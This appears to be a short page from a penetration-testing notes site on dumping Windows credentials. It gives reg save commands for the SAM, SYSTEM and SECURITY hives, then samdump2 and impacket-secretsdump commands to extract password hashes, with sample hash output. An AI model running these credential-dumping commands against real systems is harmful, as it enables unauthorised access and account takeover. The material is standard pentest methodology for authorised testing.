Registry Dump

Below we will show how we can dump credentials using the registry.

Registry Dump

reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security

After retrieving the registry hives we can extract the hashes with below commands:

samdump2 SYSTEM SAM
impacket-secretsdump -sam sam -security security -system system LOCAL

Below we find a example output for samdump2:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
LogoPage not found - HackTricksbook.hacktricks.xyz
PreviousMimikatzNextReport writing

Last updated